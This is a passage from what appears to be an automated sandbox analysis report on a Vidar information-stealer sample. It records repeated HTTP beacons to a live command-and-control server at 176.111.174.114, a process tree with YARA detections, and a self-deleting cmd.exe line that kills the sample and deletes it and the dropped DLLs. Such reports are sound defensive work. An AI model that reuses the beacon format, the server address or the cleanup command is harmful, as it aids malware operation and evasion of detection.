                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:22 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          77176.111.174.11480192.168.2.449786C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:22.139811993 CEST4797INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:22 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Refresh: 1; url = login.php
                                                                                                                                          Content-Length: 0
                                                                                                                                          Content-Type: text/html; charset=UTF-8


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          78192.168.2.449787176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:22.342422009 CEST4797OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          79176.111.174.11480192.168.2.449787C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:22.441771984 CEST4798INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:22 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          8192.168.2.449752176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:10.540479898 CEST4432OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          80192.168.2.449789176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:22.657372952 CEST4798OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          81176.111.174.11480192.168.2.449789C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:22.759411097 CEST4799INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:22 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          82192.168.2.449790176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:22.965888977 CEST4799OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          83176.111.174.11480192.168.2.449790C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:23.065470934 CEST4800INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:23 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          84192.168.2.449791176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:23.285707951 CEST4800OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          85176.111.174.11480192.168.2.449791C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:23.391833067 CEST4801INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:23 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          86192.168.2.449793176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:23.594203949 CEST4801OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          87176.111.174.11480192.168.2.449793C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:23.694056988 CEST4802INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:23 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          88192.168.2.449794176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:23.904932022 CEST4803OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          89176.111.174.11480192.168.2.449794C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:24.004654884 CEST4803INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:23 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          9176.111.174.11480192.168.2.449752C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:10.649502993 CEST4489INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:10 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          90192.168.2.449795176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:24.222855091 CEST4803OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          91176.111.174.11480192.168.2.449795C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:24.323769093 CEST4804INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:24 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          92192.168.2.449796176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:24.539024115 CEST4805OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          93176.111.174.11480192.168.2.449796C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:24.642560959 CEST4805INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:24 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          94192.168.2.449797176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:24.846404076 CEST4806OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          95176.111.174.11480192.168.2.449797C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:24.952948093 CEST4806INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:24 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          96192.168.2.449798176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:25.163521051 CEST4807OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          97176.111.174.11480192.168.2.449798C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:25.269587040 CEST4807INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:25 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          98192.168.2.449799176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:25.493153095 CEST4808OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          99176.111.174.11480192.168.2.449799C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:25.592848063 CEST4808INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:25 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          HTTPS Packets

                                                                                                                                          TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                          Apr 28, 2021 22:58:41.636985064 CEST104.17.63.50443192.168.2.449733CN=*.faceit.com, O=FACE IT LIMITED, L=London, C=GB CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=USCN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USMon Jun 17 02:00:00 CEST 2019 Mon Nov 06 13:23:45 CET 2017Wed Jul 21 14:00:00 CEST 2021 Sat Nov 06 13:23:45 CET 2027771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                          CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USMon Nov 06 13:23:45 CET 2017Sat Nov 06 13:23:45 CET 2027

                                                                                                                                          Code Manipulations

                                                                                                                                          Statistics

                                                                                                                                          CPU Usage

                                                                                                                                          Click to jump to process

                                                                                                                                          Memory Usage

                                                                                                                                          Click to jump to process

                                                                                                                                          High Level Behavior Distribution

                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                          Behavior

                                                                                                                                          Click to jump to process

                                                                                                                                          System Behavior

                                                                                                                                          Analysis Process: wKYTg7Gp6P.exe PID: 6924 Parent PID: 5932

                                                                                                                                          General

                                                                                                                                          Start time:22:58:38
                                                                                                                                          Start date:28/04/2021
                                                                                                                                          Path:C:\Users\user\Desktop\wKYTg7Gp6P.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:'C:\Users\user\Desktop\wKYTg7Gp6P.exe'
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:573952 bytes
                                                                                                                                          MD5 hash:C4C7D74CA7C0FC1511A82B040A274549
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000003.659819807.0000000002250000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.700376910.0000000002180000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                          Reputation:low

                                                                                                                                          Chronological Activities

                                                                                                                                          Analysis Process: M7WCJ84VE5TXJ0R4.exe PID: 6780 Parent PID: 6924

                                                                                                                                          General

                                                                                                                                          Start time:22:58:56
                                                                                                                                          Start date:28/04/2021
                                                                                                                                          Path:C:\ProgramData\M7WCJ84VE5TXJ0R4.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:'C:\ProgramData\M7WCJ84VE5TXJ0R4.exe'
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:290304 bytes
                                                                                                                                          MD5 hash:31AB82365078548DCEA62DA7C2380B2E
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Antivirus matches:
                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                          Reputation:low

                                                                                                                                          Chronological Activities

                                                                                                                                          Analysis Process: cmd.exe PID: 5732 Parent PID: 6924

                                                                                                                                          General

                                                                                                                                          Start time:22:58:57
                                                                                                                                          Start date:28/04/2021
                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:'C:\Windows\System32\cmd.exe' /c taskkill /im wKYTg7Gp6P.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\wKYTg7Gp6P.exe' & del C:\ProgramData\*.dll & exit
                                                                                                                                          Imagebase:0x11d0000
                                                                                                                                          File size:232960 bytes
                                                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          Chronological Activities

                                                                                                                                          Analysis Process: conhost.exe PID: 3028 Parent PID: 5732

                                                                                                                                          General

                                                                                                                                          Start time:22:58:58
                                                                                                                                          Start date:28/04/2021
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff724c50000
                                                                                                                                          File size:625664 bytes
                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          Chronological Activities

                                                                                                                                          Analysis Process: taskkill.exe PID: 6068 Parent PID: 5732

                                                                                                                                          General

                                                                                                                                          Start time:22:58:58
                                                                                                                                          Start date:28/04/2021
                                                                                                                                          Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:taskkill /im wKYTg7Gp6P.exe /f
                                                                                                                                          Imagebase:0xf00000
                                                                                                                                          File size:74752 bytes
                                                                                                                                          MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          Chronological Activities

                                                                                                                                          Analysis Process: timeout.exe PID: 5724 Parent PID: 5732

                                                                                                                                          General

                                                                                                                                          Start time:22:58:59
                                                                                                                                          Start date:28/04/2021
                                                                                                                                          Path:C:\Windows\SysWOW64\timeout.exe
